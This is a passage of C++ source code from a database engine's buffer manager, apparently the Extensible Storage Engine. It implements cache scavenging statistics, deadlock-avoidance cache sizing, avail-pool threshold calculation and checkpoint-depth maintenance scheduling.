statsCurrRun.cbfEvictedShrink++;
}
}
else if ( errEvict == errBFIPageDirty )
{
// Attempt to write the page so we're able to evict it soon.
//
// Punt resource to the next bucket to avoid visiting it again while it's undergoing write
if ( pbf->sxwl.ErrTryAcquireSharedLatch() == CSXWLatch::ERR::errSuccess )
{
g_bflruk.PuntResource( pbf, (TICK)( g_csecBFLRUKUncertainty * 1000 ) ); // Punt it to the next bucket.
pbf->sxwl.ReleaseSharedLatch();
}
// Async-flush this page.
const IOREASON ior = IOR( ( ( bfefReason == bfefReasonShrink ) ? iorpBFShrink : iorpBFAvailPool ), fSync ? iorfForeground : iorfNone );
const OSFILEQOS qos = QosBFIMaintScavengePages( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramIOPriority ), ulScavengeWriteSev );
const ERR errFlush = ErrBFIFlushPage( pbf, ior, qos, bfdfDirty, fFalse /* fOpportune */, &fPermanentErr );
// Count the number of latched pages we see.
if ( errFlush == errBFLatchConflict )
{
statsCurrRun.cbfLatched++;
}
// Count the number of dependent pages we see.
else if ( errFlush == errBFIRemainingDependencies ||
errFlush == errBFIPageTouchTooRecent ||
errFlush == errBFIDependentPurged )
{
statsCurrRun.cbfDependent++;
statsCurrRun.cbfTouchTooRecent += ( errFlush == errBFIPageTouchTooRecent ); // Count the number of pinned pages due to LLR.
fPermanentErr = fPermanentErr || ( errFlush == errBFIDependentPurged ); // Should be treated as a permanent error because we'll never get out of this state.
}
// We caused a page to be flushed (not necessarily this page).
else if ( errFlush == errBFIPageFlushed )
{
statsCurrRun.cbfFlushed++;
statsCurrRun.cbfFlushPending++;
}
// We see a page that is in the process of being flushed.
else if ( errFlush == errBFIPageFlushPending )
{
statsCurrRun.cbfFlushPending++;
}
// We see a page that is in the process of being flushed and the I/O is slow.
else if ( errFlush == errBFIPageFlushPendingSlowIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingSlow++;
}
// We see a page that is in the process of being flushed and the I/O is hung.
else if ( errFlush == errBFIPageFlushPendingHungIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingHung++;
fHungIO = fTrue;
}
// Ignore pages that can't be flushed because we are on the I/O thread.
else if ( errFlush == errBFIPageFlushDisallowedOnIOThread )
{
// We should only see this if we are on the I/O thread
Assert( !fPermanentErr );
Assert( FIOThread() );
FireWall( "ScavengeFromIoThread" );
}
// If we got errDiskTilt then flush our I/O queue to hopefully get a head start on our I/O.
else if ( errFlush == errDiskTilt )
{
statsCurrRun.cbfDiskTilt++;
Assert( !fPermanentErr );
(void)bfil.ErrIssue( fFalse );
statsCurrRun.eStopReason = eScavengeBailedDiskTilt;
break;
}
else if ( errFlush == JET_errOutOfMemory )
{
statsCurrRun.cbfOutOfMemory++;
}
else if ( errFlush == errBFIPageAbandoned )
{
statsCurrRun.cbfAbandoned++;
}
else
{
fHungIO = FBFIIsIOHung( pbf ); // Just in case.
AssertSz( !fHungIO, "Hung I/Os should have been captured by other errors, so it's not expected here!" );
}
}
else if ( errEvict == errBFIPageFlushPending )
{
statsCurrRun.cbfFlushPending++;
}
else if ( errEvict == errBFIPageFlushPendingSlowIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingSlow++;
}
else if ( errEvict == errBFIPageFlushPendingHungIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingHung++;
fHungIO = fTrue;
}
else if ( errEvict == errBFLatchConflict )
{
statsCurrRun.cbfLatched++;
}
else if ( errEvict == errBFIPageFaultPending )
{
statsCurrRun.cbfFaultPending++;
}
else if ( errEvict == errBFIPageFaultPendingHungIO )
{
statsCurrRun.cbfFaultPending++;
statsCurrRun.cbfFaultPendingHung++;
fHungIO = fTrue;
}
else
{
FireWall( OSFormat( "ScavengeUnknownErr:%d", errEvict ) );
}
// Treat a hung I/O as a permanent error.
if ( fHungIO )
{
fPermanentErr = fTrue;
statsCurrRun.cbfHungIOs++;
}
// Ignore pages where we start getting permanent IO-type errors.
if ( fPermanentErr )
{
// Punt resource to postpone visiting it again.
if ( pbf->sxwl.ErrTryAcquireSharedLatch() == CSXWLatch::ERR::errSuccess )
{
g_bflruk.PuntResource( pbf, 60 * 1000 ); // 1 minute into the future
pbf->sxwl.ReleaseSharedLatch();
}
statsCurrRun.cbfPermanentErrs++;
}
#ifdef DEBUG
Assert( statsCurrRun.cbfFlushPending >= ( statsCurrRun.cbfFlushPendingSlow + statsCurrRun.cbfFlushPendingHung ) );
Assert( statsCurrRun.cbfFaultPending >= statsCurrRun.cbfFaultPendingHung );
cbfCacheUsed = CbfBFICacheUsed();
cbfCacheUsedMin = UlpFunctionalMin( cbfCacheUsedMin, cbfCacheUsed );
cbfCacheUsedMax = UlpFunctionalMax( cbfCacheUsedMax, cbfCacheUsed );
#endif // DEBUG
}// end while ( fTrue ) - for each target resource loop.
#ifdef DEBUG
Assert( statsCurrRun.eStopReason != eScavengeInvalid );
Assert( ( errLRUK == BFLRUK::ERR::errNoCurrentResource ) || ( statsCurrRun.eStopReason != eScavengeVisitedAllLrukEntries ) );
Assert( ( errLRUK != BFLRUK::ERR::errNoCurrentResource ) || ( statsCurrRun.eStopReason == eScavengeVisitedAllLrukEntries ) );
cbfCacheUsed = CbfBFICacheUsed();
cbfCacheUsedMin = UlpFunctionalMin( cbfCacheUsedMin, cbfCacheUsed );
cbfCacheUsedMax = UlpFunctionalMax( cbfCacheUsedMax, cbfCacheUsed );
const LONG cbfSuperColdedFinal = g_bflruk.CSuperColdSuccesses();
// The purpose of this code is to catch bugs where we scan too too many resources (i.e., return
// the same resources multiple times). It is only an Expected() because I can't prove that it is
// mathematically impossible to hit (timing, shrink running in parallel, etc...), but it should
// hold in most cases for caches over 1000 buffers.
// Because the check is not thread-safe and the entire LRU-K is not locked during this process,
// evicted buffers could be re-allocated and show up again in the same cycle. Also, cache resizing
// running in parallel can throw off our calculations. Hence, we'll have to loosen the asserts and
// accept a 25% discrepancy.
if ( cbfCacheUsedMin >= 1000 )
{
if ( statsCurrRun.eStopReason == eScavengeVisitedAllLrukEntries )
{
// Super colded resources might move for newer positions into older ones and might
// be missed when scanning the approximate index.
const LONG cbfSuperColded = cbfSuperColdedFinal - cbfSuperColdedInitial;
Assert( cbfSuperColded >= 0 );
Expected( ( statsCurrRun.cbfVisited + cbfSuperColded ) >= ( cbfCacheUsedMin - cbfCacheUsedMin / 4 ) );
}
Expected( statsCurrRun.cbfVisited <= ( cbfCacheUsedMax + cbfCacheUsedMax / 4 ) );
}
#endif // DEBUG
// End our scan of the LRUK and issue queued writes.
//
g_bflruk.EndResourceScan( &lockLRUK );
// Issue any queued writes and log flushes.
(void)bfil.ErrIssue( fFalse );
// Compute the minimum cache size to avoid an allocation deadlock.
//
// NOTE: grow the computed size by 10% to allow efficient growth of the
// cache out of a scenario with repeated deadlocks.
Assert( statsCurrRun.cbfFlushPending >= statsCurrRun.cbfFlushPendingHung );
Assert( statsCurrRun.cbfFaultPending >= statsCurrRun.cbfFaultPendingHung );
cbfCacheDeadlock = ( statsCurrRun.cbfPermanentErrs +
statsCurrRun.cbfDependent +
statsCurrRun.cbfLatched +
( statsCurrRun.cbfFaultPending - statsCurrRun.cbfFaultPendingHung ) + // Hung already accounted for in permanent errors.
( statsCurrRun.cbfFlushPending - statsCurrRun.cbfFlushPendingHung ) + // Hung already accounted for in permanent errors.
g_bfavail.CWaiter() + ( fSync ? 1 : 0 ) );
const LONG_PTR cbfCacheDeadlockMargin = max( cbfCacheDeadlock / 10, 1 );
cbfCacheDeadlock = cbfCacheDeadlock + cbfCacheDeadlockMargin;
g_cbfCacheDeadlockMax = max( g_cbfCacheDeadlockMax, cbfCacheDeadlock );
Assert( cbfCacheDeadlock < INT_MAX );
statsCurrRun.cbfCacheDeadlock = (LONG)cbfCacheDeadlock;
// Update states and calculate if we are in a hung state.
//
// wrnSlow is returned if all buffers have been visited but none was evicted.
// wrnSlow gets upgraded to JET_errOutOfBuffers if all visited buffers are
// in a state of permanent error or we got OOM trying to evict them, except
// if all flush attemps got OOM, in which case, we return JET_errOutOfMemory.
// Otherwise, we return success.
ERR errHang = JET_errSuccess;
if ( ( statsCurrRun.eStopReason == eScavengeVisitedAllLrukEntries ) &&
( ( statsCurrRun.cbfEvictedAvailPool + statsCurrRun.cbfEvictedShrink ) == 0 ) &&
( statsCurrRun.cbfVisited > 0 ) )
{
const LONG cbfUnflushable = statsCurrRun.cbfPermanentErrs + statsCurrRun.cbfOutOfMemory;
if ( cbfUnflushable >= statsCurrRun.cbfVisited )
{
Assert( cbfUnflushable == statsCurrRun.cbfVisited );
if ( statsCurrRun.cbfVisited == statsCurrRun.cbfOutOfMemory )
{
errHang = ErrERRCheck( JET_errOutOfMemory );
}
else
{
errHang = ErrERRCheck( JET_errOutOfBuffers );
}
}
else
{
errHang = ErrERRCheck( wrnSlow );
}
}
statsCurrRun.errRun = errHang;
statsCurrRun.tickEnd = TickOSTimeCurrent();
// Track the last X runs.
g_iScavengeLastRun = IrrNext( g_iScavengeLastRun, g_cScavengeLastRuns );
Assert( g_iScavengeLastRun >= 0 && g_iScavengeLastRun < g_cScavengeLastRuns );
// g_rgScavengeLastRuns[g_iScavengeLastRun] = statsCurrRun;
AssumePREFAST( g_iScavengeLastRun < g_cScavengeLastRuns );
memcpy( &(g_rgScavengeLastRuns[g_iScavengeLastRun]), &statsCurrRun, sizeof(statsCurrRun) );
// Tack evenly timed runs over the last timeout span.
if ( g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast].tickEnd == 0 ||
DtickDelta( g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast].tickEnd, statsCurrRun.tickEnd ) > dtickMaintScavengeTimeSeqDelta )
{
g_iScavengeTimeSeqLast = IrrNext( g_iScavengeTimeSeqLast, g_cScavengeTimeSeq );
Assert( g_iScavengeTimeSeqLast >= 0 && g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
// g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast] = statsCurrRun;
AssumePREFAST( g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
memcpy( &(g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast]), &statsCurrRun, sizeof(statsCurrRun) );
#ifndef RTM
// g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast] = statsCurrRun;
memcpy( &(g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast]), &statsCurrRun, sizeof(statsCurrRun) );
#endif
}
else
{
Assert( g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
AssumePREFAST( g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
#ifndef RTM
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].iRun = statsCurrRun.iRun; // High iRun.
// g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].iRun = statsCurrRun.fSync;
// g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].iRun = statsCurrRun.tickStart;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].tickEnd = statsCurrRun.tickEnd; // High tickEnd.
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSize = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSize, statsCurrRun.cbfCacheSize );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheTarget = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheTarget, statsCurrRun.cbfCacheTarget );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSizeStartShrink = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSizeStartShrink, statsCurrRun.cbfCacheSizeStartShrink );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].dtickShrinkDuration = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].dtickShrinkDuration, statsCurrRun.dtickShrinkDuration );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheDeadlock = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheDeadlock, statsCurrRun.cbfCacheDeadlock );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvail = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvail, statsCurrRun.cbfAvail );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolLow = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolLow, statsCurrRun.cbfAvailPoolLow );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolHigh = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolHigh, statsCurrRun.cbfAvailPoolHigh );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolTarget = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolTarget, statsCurrRun.cbfAvailPoolTarget );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfVisited += statsCurrRun.cbfVisited;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushed += statsCurrRun.cbfFlushed;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfEvictedAvailPool += statsCurrRun.cbfEvictedAvailPool;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfEvictedShrink += statsCurrRun.cbfEvictedShrink;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfShrinkFromAvailPool += statsCurrRun.cbfShrinkFromAvailPool;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushPending += statsCurrRun.cbfFlushPending;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushPendingSlow += statsCurrRun.cbfFlushPendingSlow;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushPendingHung += statsCurrRun.cbfFlushPendingHung;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFaultPending += statsCurrRun.cbfFaultPending;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFaultPendingHung += statsCurrRun.cbfFaultPendingHung;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfOutOfMemory += statsCurrRun.cbfOutOfMemory;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfLatched += statsCurrRun.cbfLatched;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfDiskTilt += statsCurrRun.cbfDiskTilt;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAbandoned += statsCurrRun.cbfAbandoned;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfDependent += statsCurrRun.cbfDependent;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfTouchTooRecent += statsCurrRun.cbfTouchTooRecent;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfPermanentErrs += statsCurrRun.cbfPermanentErrs;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfHungIOs += statsCurrRun.cbfHungIOs;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].errRun = ( statsCurrRun.errRun < JET_errSuccess ) ? statsCurrRun.errRun : 0;
#endif
}
// Report progress in scavenging.
ETCacheScavengeProgress(
statsCurrRun.iRun,
statsCurrRun.cbfVisited,
statsCurrRun.cbfCacheSize,
statsCurrRun.cbfCacheTarget,
statsCurrRun.cbfCacheSizeStartShrink,
statsCurrRun.dtickShrinkDuration,
statsCurrRun.cbfAvail,
statsCurrRun.cbfAvailPoolLow,
statsCurrRun.cbfAvailPoolHigh,
statsCurrRun.cbfFlushPending,
statsCurrRun.cbfFlushPendingSlow,
statsCurrRun.cbfFlushPendingHung,
statsCurrRun.cbfOutOfMemory,
statsCurrRun.cbfPermanentErrs,
(INT)statsCurrRun.eStopReason,
statsCurrRun.errRun );
if ( errHang != JET_errSuccess )
{
OSTrace(
JET_tracetagBufferManagerMaintTasks,
OSFormat( "BF: ===== scan efficacy =========\r\n"
"BF: iRun = %I64d\r\n"
"BF: cbfVisited = %I32d\r\n"
"BF: cbfCacheSize = %I32d\r\n"
"BF: cbfCacheTarget = %I32d\r\n"
"BF: cbfCacheSizeStartShrink = %I32d\r\n"
"BF: dtickShrinkDuration = %I32u\r\n"
"BF: cbfAvail = %I32d\r\n"
"BF: cbfAvailPoolLow = %I32d\r\n"
"BF: cbfAvailPoolHigh = %I32d\r\n"
"BF: cbfFlushPending = %I32d\r\n"
"BF: cbfFlushPendingSlow = %I32d\r\n"
"BF: cbfFlushPendingHung = %I32d\r\n"
"BF: cbfOutOfMemory = %I32d\r\n"
"BF: cbfPermanentErrs = %I32d\r\n"
"BF: eStopReason = %d\r\n"
"BF: errRun = %d\r\n",
statsCurrRun.iRun,
statsCurrRun.cbfVisited,
statsCurrRun.cbfCacheSize,
statsCurrRun.cbfCacheTarget,
statsCurrRun.cbfCacheSizeStartShrink,
statsCurrRun.dtickShrinkDuration,
statsCurrRun.cbfAvail,
statsCurrRun.cbfAvailPoolLow,
statsCurrRun.cbfAvailPoolHigh,
statsCurrRun.cbfFlushPending,
statsCurrRun.cbfFlushPendingSlow,
statsCurrRun.cbfFlushPendingHung,
statsCurrRun.cbfOutOfMemory,
statsCurrRun.cbfPermanentErrs,
(INT)statsCurrRun.eStopReason,
statsCurrRun.errRun ) );
}
// If we did any shrink work, release the resizing critical section and attempt to
// release reserved memory.
//
if ( fOwnCacheResizeCritSec )
{
Assert( ( cbfCacheAddressableInitial != -1 ) && ( cbfCacheSizeInitial != -1 ) );
// Notify about cache size changes.
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
// Deallocate as much as we can from the top of the cache.
BFICacheIShrinkAddressable();
g_critCacheSizeResize.Leave();
fOwnCacheResizeCritSec = fFalse;
}
// There are cases in which we may have finished earlier because of external setting of the next cache target,
// so force consumption of any potential new set point. Also, we may need to grow the cache due to the just-refreshed
// deadlock setting.
// The call to ErrBFIMaintCacheSizeRequest() is synchronous when it represents a growth in cache size (as should be the case for deadlock).
BFICacheSetTarget( OnDebug( cbfCacheDeadlock ) );
(void)ErrBFIMaintCacheSizeRequest();
// Reset deadlock protection if we've already grown the cache (thus releasing pages to the avail pool for waiters to consume).
if ( cbfCacheSize >= cbfCacheDeadlock )
{
cbfCacheDeadlock = 0;
}
// Restore cleanup checking.
FOSSetCleanupState( fCleanUpStateSaved );
return errHang;
}
// updates the avail pool thresholds
void BFIMaintAvailPoolUpdateThresholds( const LONG_PTR cbfCacheTargetOptimalNew )
{
// re-compute our avail pool thresholds
//
// - if the application only set the max cache size then we must interpret
// the thresholds relative to the default max cache size because we
// changed the default values from Win2k3/Ex2k3 and the application may
// have accidentally relied on their absolute values
//
// - if the application made an inconsistent set of changes to the max cache
// size and the thresholds (other than the above case) then we will force
// 1%/2% thresholds
//
// - otherwise, we will use the thresholds as specified
Assert( g_critCacheSizeSetTarget.FOwner() );
if ( !FDefaultParam( JET_paramCacheSizeMax ) &&
FDefaultParam( JET_paramStartFlushThreshold ) &&
FDefaultParam( JET_paramStopFlushThreshold ) )
{
cbfAvailPoolLow = LONG_PTR( QWORD( UlParam( JET_paramStartFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParamDefault( JET_paramCacheSizeMax ) );
cbfAvailPoolHigh = LONG_PTR( QWORD( UlParam( JET_paramStopFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParamDefault( JET_paramCacheSizeMax ) );
}
else if ( !( ( !FDefaultParam( JET_paramCacheSizeMax ) &&
!FDefaultParam( JET_paramStartFlushThreshold ) &&
!FDefaultParam( JET_paramStopFlushThreshold ) ) ||
( FDefaultParam( JET_paramCacheSizeMax ) &&
FDefaultParam( JET_paramStartFlushThreshold ) &&
FDefaultParam( JET_paramStopFlushThreshold ) ) ) )
{
cbfAvailPoolLow = cbfCacheTargetOptimalNew / 100;
cbfAvailPoolHigh = cbfCacheTargetOptimalNew / 50;
}
else
{
cbfAvailPoolLow = LONG_PTR( QWORD( UlParam( JET_paramStartFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParam( JET_paramCacheSizeMax ) );
cbfAvailPoolHigh = LONG_PTR( QWORD( UlParam( JET_paramStopFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParam( JET_paramCacheSizeMax ) );
}
// we never allow thresholds higher than 20%/25% because that will
// waste a horrible amount of memory due to the fact that we do not hold
// database page data in available buffers
if ( cbfAvailPoolLow > cbfCacheTargetOptimalNew / 5 )
{
cbfAvailPoolLow = cbfCacheTargetOptimalNew / 5;
}
if ( cbfAvailPoolHigh > cbfCacheTargetOptimalNew / 4 )
{
cbfAvailPoolHigh = cbfCacheTargetOptimalNew / 4;
}
if ( cbfCacheTargetOptimalNew > 0 )
{
// ensure that, no matter how low / messed up the params are above, if cache size is high
// enough, set to sane minimums of 0.1% and 0.2% FlushLow / FlushHigh values respectively.
if ( cbfCacheTargetOptimalNew > 10000 )
{
if ( cbfAvailPoolLow < ( cbfCacheTargetOptimalNew / 1000 ) )
{
cbfAvailPoolLow = ( cbfCacheTargetOptimalNew / 1000 );
}
if ( cbfAvailPoolHigh < ( cbfCacheTargetOptimalNew / 500 ) )
{
cbfAvailPoolHigh = ( cbfCacheTargetOptimalNew / 500 );
}
}
// ensure that, no matter how small cbfCacheTargetOptimalNew is, we still have valid limits
if ( cbfAvailPoolLow == cbfAvailPoolHigh )
{
cbfAvailPoolHigh += cbfCacheTargetOptimalNew / 100;
}
if ( cbfAvailPoolHigh == cbfCacheTargetOptimalNew )
{
cbfAvailPoolHigh = cbfCacheTargetOptimalNew - 1;
}
if ( cbfAvailPoolHigh - cbfAvailPoolLow < 1 )
{
cbfAvailPoolHigh = min( cbfCacheTargetOptimalNew - 1, cbfAvailPoolHigh + 1 );
}
if ( cbfAvailPoolHigh - cbfAvailPoolLow < 1 )
{
cbfAvailPoolLow = max( 1, cbfAvailPoolLow - 1 );
}
if ( cbfAvailPoolHigh - cbfAvailPoolLow < 1 )
{
cbfAvailPoolHigh = cbfAvailPoolLow;
}
}
else
{
// cbfCacheTargetOptimalNew of zero is not expected during regular buffer manager operation.
Assert( cbfCacheTargetOptimalNew == 0 );
Expected( fFalse );
cbfAvailPoolLow = 0;
cbfAvailPoolHigh = 0;
}
Assert( cbfAvailPoolLow >= 0 );
Assert( cbfAvailPoolHigh >= 0 );
Assert( cbfAvailPoolLow <= cbfAvailPoolHigh );
cbfAvailPoolTarget = ( cbfAvailPoolLow + cbfAvailPoolHigh + 1 ) / 2;
Assert( cbfAvailPoolTarget >= cbfAvailPoolLow );
Assert( cbfAvailPoolTarget <= cbfAvailPoolHigh );
}
void BFIMaintScavengeIReset()
{
g_iScavengeLastRun = 0;
memset( g_rgScavengeLastRuns, 0, g_cScavengeLastRuns * sizeof(g_rgScavengeLastRuns[ 0 ]) );
g_iScavengeTimeSeqLast = 0;
memset( g_rgScavengeTimeSeq, 0, g_cScavengeTimeSeq * sizeof(g_rgScavengeTimeSeq[ 0 ]) );
#ifndef RTM
memset( g_rgScavengeTimeSeqCumulative, 0, g_cScavengeTimeSeq * sizeof(g_rgScavengeTimeSeqCumulative[ 0 ]) );
#endif
}
ERR ErrBFIMaintScavengePreInit(
INT K,
double csecCorrelatedTouch,
double csecTimeout,
double csecUncertainty,
double dblHashLoadFactor,
double dblHashUniformity,
double dblSpeedSizeTradeoff )
{
Expected( K == 1 || K == 2 ); // anything else extremely untested.
switch ( g_bflruk.ErrInit( K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff ) )
{
default:
AssertSz( fFalse, "Unexpected error initializing BF LRUK Manager" );
case BFLRUK::ERR::errOutOfMemory:
return ErrERRCheck( JET_errOutOfMemory );
case BFLRUK::ERR::errSuccess:
break;
}
BFITraceResMgrInit( K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff );
return JET_errSuccess;
}
ERR ErrBFIMaintScavengeInit( void )
{
ERR err = JET_errSuccess;
Assert( g_rgScavengeTimeSeq == NULL );
Assert( g_rgScavengeLastRuns == NULL );
Assert( g_rgScavengeTimeSeqCumulative == NULL );
// we'll base the number of scavenge stats records based on the most common
// cause for starvation, which is hung I/Os.
g_dtickMaintScavengeTimeout = (TICK)UlParam( JET_paramHungIOThreshold );
#ifdef DEBUG
g_cScavengeTimeSeq = ( 2 * g_dtickMaintScavengeTimeout ) / dtickMaintScavengeTimeSeqDelta + 3 /* extra runs to ensure we have over 2 x scavenge timeout */;
#else
g_cScavengeTimeSeq = g_dtickMaintScavengeTimeout / dtickMaintScavengeTimeSeqDelta + 2 /* extra runs to ensure we have over required scavenge timeout */;
#endif
// limit collection to between 10 and 100 samples.
g_cScavengeTimeSeq = UlpFunctionalMax( g_cScavengeTimeSeq, 10 );
g_cScavengeTimeSeq = UlpFunctionalMin( g_cScavengeTimeSeq, 100 );
Alloc( g_rgScavengeTimeSeq = new BFScavengeStats[ g_cScavengeTimeSeq ] );
Alloc( g_rgScavengeLastRuns = new BFScavengeStats[ g_cScavengeLastRuns ] );
#ifndef RTM
Alloc( g_rgScavengeTimeSeqCumulative = new BFScavengeStats[ g_cScavengeTimeSeq ] );
#endif
BFIMaintScavengeIReset();
HandleError:
if ( err < JET_errSuccess )
{
BFIMaintScavengeTerm();
}
return err;
}
void BFIMaintScavengeTerm( void )
{
#ifndef RTM
delete[] g_rgScavengeTimeSeqCumulative;
g_rgScavengeTimeSeqCumulative = NULL;
#endif
delete[] g_rgScavengeLastRuns;
g_rgScavengeLastRuns = NULL;
delete[] g_rgScavengeTimeSeq;
g_rgScavengeTimeSeq = NULL;
}
// Checkpoint Depth
CSemaphore g_semMaintCheckpointDepthRequest( CSyncBasicInfo( _T( "g_semMaintCheckpointDepthRequest" ) ) );
IFMP g_ifmpMaintCheckpointDepthStart;
ERR errLastCheckpointMaint = JET_errSuccess;
POSTIMERTASK g_posttBFIMaintCheckpointDepthITask = NULL;
#define dtickBFMaintNever 0xFFFFFFFF
// requests that checkpoint depth maintenance be performed on dirty pages in
// the cache
void BFIMaintCheckpointDepthRequest( FMP * pfmp, const BFCheckpointDepthMainReason eRequestReason )
{
// if we are asking to remove clean entries then skip all these checks and
// just try to schedule checkpoint depth maintenance
if ( eRequestReason != bfcpdmrRequestRemoveCleanEntries )
{
// make sure this is not already the checkpoint maintenance thread
// (otherwise, we will likely deadlock trying to obtain
// pfmp->RwlIBFContext())
if ( Ptls()->fCheckpoint )
{
return;
}
// ignore the request if we performed checkpoint depth maintenance recently
pfmp->EnterBFContextAsReader();
if ( eRequestReason == bfcpdmrRequestOB0Movement )
{
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( !pbffmp || !pbffmp->fCurrentlyAttached )
{
pfmp->LeaveBFContextAsReader();
return;
}
if ( TickCmp( TickOSTimeCurrent(), pbffmp->tickMaintCheckpointDepthNext ) < 0 )
{
pfmp->LeaveBFContextAsReader();
return;
}
}
else if ( eRequestReason == bfcpdmrRequestIOThreshold )
{
// Since the IO stack is globally we have to check globally if we stopped b/c
// of this error.
if ( errLastCheckpointMaint != errDiskTilt )
{
pfmp->LeaveBFContextAsReader();
return;
}
// schedule immediately
// Ok, we did stop checkpoint advancement due to too much IO, restart it
// immediately. We don't need to do all IFMPs as they will restart in 10ms
// (dtickMaintCheckpointDepthRetry).
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent();
}
}
else if ( eRequestReason == bfcpdmrRequestConsumeSettings )
{
// schedule immediately
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent();
}
}
else
{
AssertSz( fFalse, "Unknown reason (%d) for CP depth maintenance.", eRequestReason );
}
pfmp->LeaveBFContextAsReader();
}
// try to acquire the right to request checkpoint depth maintenance
BOOL fAcquiredAsync = g_semMaintCheckpointDepthRequest.FTryAcquire();
// if we acquired the right to maintain our checkpoint depth, then we will
// try to do so
if ( fAcquiredAsync )
{
// schedule a task to maintain our checkpoint depth
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "Scheduling BFIMaintCheckpointDepthITask immediately (%d).", eRequestReason ) );
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCheckpointDepthITask, NULL, 0, 0 ) >= JET_errSuccess )
{
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointDepthRequest.CAvail() == 0 );
g_semMaintCheckpointDepthRequest.Release();
}
}
// executes an async request to perform checkpoint depth maintenance
void BFIMaintCheckpointDepthITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
// this task automatically has the right to async maintenance
BOOL fAcquiredAsync = fTrue;
// maintain our checkpoint depth
TICK dtickNextSchedule = 0;
